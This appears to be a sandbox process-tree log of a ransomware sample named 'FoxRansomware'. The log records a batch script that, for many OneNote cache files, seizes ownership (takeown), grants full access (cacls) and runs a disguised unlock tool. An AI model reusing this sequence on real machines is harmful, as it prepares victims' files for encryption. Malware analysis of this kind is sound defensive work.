C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""2⤵PID:3572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C3⤵PID:5320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"3⤵PID:1456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000AD.bin" -nobanner3⤵PID:3188
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000AD.bin" -nobanner4⤵PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""2⤵PID:1000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C3⤵PID:4312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000AN.bin" -nobanner3⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000AN.bin" -nobanner4⤵PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C3⤵PID:5280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"3⤵PID:5756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000B3.bin" -nobanner3⤵PID:5524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000B3.bin" -nobanner4⤵PID:5140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""2⤵PID:2996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C3⤵PID:5176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"3⤵
- Modifies file permissions
PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000006.bin" -nobanner3⤵PID:2588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000006.bin" -nobanner4⤵PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""2⤵PID:5252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C3⤵PID:688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"3⤵PID:5128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000J.bin" -nobanner3⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000J.bin" -nobanner4⤵PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""2⤵PID:4320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C3⤵PID:300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"3⤵PID:288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000U.bin" -nobanner3⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000U.bin" -nobanner4⤵PID:3836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""2⤵PID:4932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C3⤵PID:284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"3⤵PID:5452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000018.bin" -nobanner3⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000018.bin" -nobanner4⤵PID:3244
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""2⤵PID:5392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"3⤵PID:5692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000052.bin" -nobanner3⤵PID:5820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000052.bin" -nobanner4⤵PID:5324
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin""2⤵PID:2420
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin" /E /G Admin:F /C3⤵PID:5988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin"3⤵
- Modifies file permissions
PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000006U.bin" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000006U.bin" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin""2⤵PID:5664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin" /E /G Admin:F /C3⤵PID:5892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin"3⤵PID:5744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000078.bin" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000078.bin" -nobanner4⤵PID:5360
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin""2⤵PID:5400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin" /E /G Admin:F /C3⤵PID:5992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin"3⤵PID:4360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007I.bin" -nobanner3⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007I.bin" -nobanner4⤵PID:1596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin""2⤵PID:2320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin" /E /G Admin:F /C3⤵PID:2800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin"3⤵
- Modifies file permissions
PID:2288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008H.bin" -nobanner3⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008H.bin" -nobanner4⤵PID:6140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""2⤵PID:3432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C3⤵PID:492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"3⤵PID:5384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000007.bin" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000007.bin" -nobanner4⤵PID:3908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""2⤵PID:5756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C3⤵PID:2804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"3⤵
- Modifies file permissions
PID:5636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000L.bin" -nobanner3⤵PID:3748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000L.bin" -nobanner4⤵PID:5924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""2⤵PID:3980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C3⤵PID:4992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"3⤵PID:4408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000V.bin" -nobanner3⤵PID:2508
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000V.bin" -nobanner4⤵PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""2⤵PID:6104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C3⤵PID:5156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"3⤵PID:4692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000006L.bin" -nobanner3⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000006L.bin" -nobanner4⤵PID:5216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""2⤵PID:5404
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C3⤵PID:5844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007T.bin" -nobanner3⤵PID:3276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007T.bin" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""2⤵PID:5712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C3⤵PID:4556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"3⤵PID:5928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000087.bin" -nobanner3⤵PID:296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000087.bin" -nobanner4⤵PID:1016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""2⤵PID:5644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C3⤵PID:2528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"3⤵PID:5660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000099.bin" -nobanner3⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000099.bin" -nobanner4⤵PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""2⤵PID:4468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C3⤵PID:3472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"3⤵PID:5352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000009J.bin" -nobanner3⤵PID:3200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000009J.bin" -nobanner4⤵PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""2⤵PID:5320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C3⤵PID:3516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"3⤵PID:5736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000A4.bin" -nobanner3⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000A4.bin" -nobanner4⤵PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""2⤵PID:2288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C3⤵PID:5136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"3⤵PID:1584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000AF.bin" -nobanner3⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000AF.bin" -nobanner4⤵PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""2⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C3⤵PID:2616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"3⤵PID:4948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000AP.bin" -nobanner3⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000AP.bin" -nobanner4⤵PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""2⤵PID:3612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C3⤵PID:5176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"3⤵
- Modifies file permissions
PID:5524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000B5.bin" -nobanner3⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000B5.bin" -nobanner4⤵PID:3804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""2⤵PID:5464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C3⤵PID:5800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"3⤵PID:5268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000008.bin" -nobanner3⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000008.bin" -nobanner4⤵PID:1932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""2⤵PID:1168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C3⤵PID:5768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"3⤵
- Modifies file permissions
PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000M.bin" -nobanner3⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000M.bin" -nobanner4⤵PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""2⤵PID:2644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C3⤵PID:3592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"3⤵PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000010.bin" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000010.bin" -nobanner4⤵PID:5772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2792
-
-
-
